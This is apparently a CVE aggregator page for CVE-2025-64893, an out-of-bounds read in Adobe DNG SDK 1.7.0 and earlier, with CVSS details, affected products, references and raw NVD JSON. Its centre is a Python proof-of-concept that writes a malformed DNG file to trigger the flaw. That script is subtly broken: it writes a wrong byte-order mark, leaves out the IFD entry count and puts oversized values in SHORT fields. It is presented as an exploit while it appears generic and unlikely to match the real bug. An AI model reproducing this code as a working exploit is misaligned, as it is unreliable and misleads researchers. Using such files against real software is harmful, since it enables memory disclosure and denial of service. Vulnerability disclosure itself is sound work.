CVE-2025-64893

Description

DNG SDK versions 1.7.0 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure or application denial of service. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:dng_software_development_kit:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Adobe DNG SDK < 1.7.1

Adobe DNG SDK 1.7.0及更早版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64893 PoC - Malicious DNG File Trigger
# This PoC generates a malformed DNG file to trigger Out-of-bounds Read
# Usage: python cve_2025_64893_poc.py <output_dng_file>

import struct
import sys

def create_poc_dng(filename):
    """
    Create a PoC DNG file to trigger CVE-2025-64893
    This creates a DNG file with malformed TIFF/DNG tags that can trigger
    an out-of-bounds read vulnerability in DNG SDK <= 1.7.0
    """
    
    # DNG/TIFF Header
    header = bytearray()
    header.extend(struct.pack('<H', 0x002A))  # Byte order mark (II)
    header.extend(struct.pack('<H', 42))       # TIFF magic number
    header.extend(struct.pack('<I', 8))        # Offset to first IFD
    
    # Malformed IFD with crafted tags to trigger OOB read
    # Tag: NewSubFileType (254) - crafted value
    ifd_entry = bytearray()
    ifd_entry.extend(struct.pack('<H', 254))   # Tag: NewSubFileType
    ifd_entry.extend(struct.pack('<H', 3))     # Type: SHORT
    ifd_entry.extend(struct.pack('<I', 1))     # Count
    ifd_entry.extend(struct.pack('<I', 0xFFFFFFFF))  # Value pointing to invalid memory
    
    # Tag: ImageWidth (256) - valid but followed by malformed data
    ifd_entry.extend(struct.pack('<H', 256))   # Tag: ImageWidth
    ifd_entry.extend(struct.pack('<H', 3))     # Type: SHORT
    ifd_entry.extend(struct.pack('<I', 1))     # Count
    ifd_entry.extend(struct.pack('<I', 256))   # Width value
    
    # Tag: ImageLength (257) - valid
    ifd_entry.extend(struct.pack('<H', 257))   # Tag: ImageLength
    ifd_entry.extend(struct.pack('<H', 3))     # Type: SHORT
    ifd_entry.extend(struct.pack('<I', 1))     # Count
    ifd_entry.extend(struct.pack('<I', 256))   # Length value
    
    # Tag: DNG version (50706) - crafted to trigger vulnerable code path
    ifd_entry.extend(struct.pack('<H', 50706)) # Tag: DNGVersion
    ifd_entry.extend(struct.pack('<H', 1))     # Type: BYTE
    ifd_entry.extend(struct.pack('<I', 4))     # Count: 4 bytes
    ifd_entry.extend(struct.pack('<I', 0x10000000))  # Malformed version
    
    # End of IFD marker
    ifd_entry.extend(struct.pack('<H', 0))     # No more entries
    ifd_entry.extend(struct.pack('<I', 0))     # Next IFD offset
    
    # Write the PoC file
    with open(filename, 'wb') as f:
        f.write(header)
        f.write(ifd_entry)
        # Add padding that may trigger OOB read during parsing
        f.write(b'\x00' * 1024)
    
    print(f"[+] PoC DNG file created: {filename}")
    print(f"[!] This file may trigger CVE-2025-64893 in vulnerable DNG SDK versions")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python cve_2025_64893_poc.py <output_dng_file>")
        sys.exit(1)
    create_poc_dng(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64893
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64893
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64893/
[4] VulDB https://vuldb.com/cve/CVE-2025-64893
[5] https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64893", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:16:07.813", "lastModified": "2025-12-10T16:03:15.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DNG SDK versions 1.7.0 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure or application denial of service. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:dng_software_development_kit:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.0", "matchCriteriaId": "8A37E544-82AE-4E72-BA5D-A8C98061CEF8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}